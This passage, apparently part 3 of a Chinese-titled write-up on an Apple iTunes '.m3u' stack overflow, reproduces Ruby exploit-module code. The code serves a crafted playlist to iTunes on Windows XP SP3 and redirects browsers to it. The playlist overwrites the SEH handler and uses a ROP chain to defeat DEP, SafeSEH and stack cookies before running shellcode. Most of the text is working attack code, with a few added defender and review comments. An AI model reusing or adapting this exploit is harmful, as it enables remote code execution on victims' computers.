Apple iTunes '.m3u'文件远程栈缓冲区溢出漏洞(3)


        if request.uri =~ /\.ico$/i
            # Discard requests for ico files
            send_not_found(cli)
        #elsif agent =~ /iTunes\/10.6.1/ and agent =~ /Windows XP Professional Service Pack 3/ and request.uri =~ /\.m3u$/i
        elsif agent =~ /iTunes/ and agent =~ /Windows XP Professional Service Pack 3/ and request.uri =~ /\.m3u$/i
            # exploit iTunes (<= 10.6.1.7) on Windows XP SP3
            send_response(cli, generate_m3u(p), { 'Content-Type' => 'audio/x-mpegurl' })
            status(request,cli,"Sending playlist")
        elsif agent =~ /MSIE (6|7|8)\.0/ and agent =~ /NT 5\.1/
            # redirect MSIE to iTunes link
            send_response(cli, generate_redirect_ie(m3u_location), { 'Content-Type' => 'text/html' })
            status(request,cli,"Redirecting to playlist")
        elsif agent =~ /NT 5\.1/
            # redirect Firefox, Chrome, Opera, Safari to iTunes link
            send_redirect(cli, m3u_location)
            status(request,cli,"Redirecting to playlist")
        else
            send_not_found(cli)
            print_status("Unknown User-Agent. Sending 404")
        end

end

# IE did not properly follow an itms:// redirect delivered via an HTTP Location header...
    # ... so use an HTML meta refresh instead

def generate_redirect_ie(m3u_location)
  # Build the HTML page that bounces Internet Explorer to +m3u_location+
  # with an immediate meta refresh (IE does not follow an itms:// target
  # sent in a Location header).
  #
  # @param m3u_location [String] URL of the playlist; it is interpolated
  #   verbatim into the refresh attribute (no HTML escaping is applied),
  #   so callers must supply a value that is safe to embed
  # @return [String] six-line HTML document, each line indented twelve
  #   spaces and newline-terminated
  indent = ' ' * 12
  lines = [
    '<!DOCTYPE HTML>',
    '<html>',
    '<head>',
    %(<meta http-equiv="refresh" content="0; URL=#{m3u_location}">),
    '</head>',
    '</html>'
  ]
  lines.map { |line| "#{indent}#{line}\n" }.join
end

# create the malicious playlist

def generate_m3u(payload)

# Build the crafted .m3u playlist that is served to the vulnerable iTunes
# client (see the request handler above).
#
# @param payload [String] shellcode bytes; appended after the ROP chain
# @return [String] a single '#EXTINF:,' entry padded out to 0x1000 bytes.
#   The result is not a usable playlist; only its byte layout matters.
#
# Depends on names supplied by the enclosing module, not by this block:
# `targets` (per-target addresses), `gimme_rop` (the ROP chain) and
# `rand_text_alphanumeric` (random filler of the requested length).
#
# Defender's note: the entire trigger is one over-long #EXTINF line; a
# parser that bounds the length of that entry never reaches the overflow,
# and a playlist whose first line is ~4 KiB of mostly non-text data is an
# easy signature for the malicious file.

# Bypass stack cookies by triggering a SEH exception before
        # the cookie gets checked. SafeSEH is bypassed by using a non
        # safeSEH DLL [QuickTime.qts v7.7.2]. DEP is bypassed by using ROP.

# stack buffer overflow ->
        # overwrite SEH handler ->
        # trigger SEH exception ->
        # rewind stack (ADD ESP, ...) and land in ROP NOP sled  ->
        # virtualprotect and execute shellcode

# NOTE(review): always uses targets[0], regardless of which target the
# user selected -- presumably the module defines a single target; confirm.
target = targets[0]

m3u = '#EXTINF:,'

# stack layout depends on what iTunes is doing (running or not, playing music etc.) ...
        # ... so ensure we overwrite a SEH handler to get back to our rop chain
        m3u << [target['SEH']].pack("V") * 0x6a       # stack pivot/rewind (0x6a little-endian copies)
        m3u << [target['ROP_NOP']].pack("V") * 30     # ROP NOP sled
        m3u << gimme_rop
        m3u << payload

# 0x1000 should be enough to overflow the stack and trigger SEH
# NOTE(review): if the SEH/ROP prefix plus `payload` already exceeds 0x1000
# bytes, the requested filler length goes negative -- confirm that
# rand_text_alphanumeric tolerates that, or cap the payload size.
        m3u << rand_text_alphanumeric(0x1000 - m3u.length)

return m3u

end
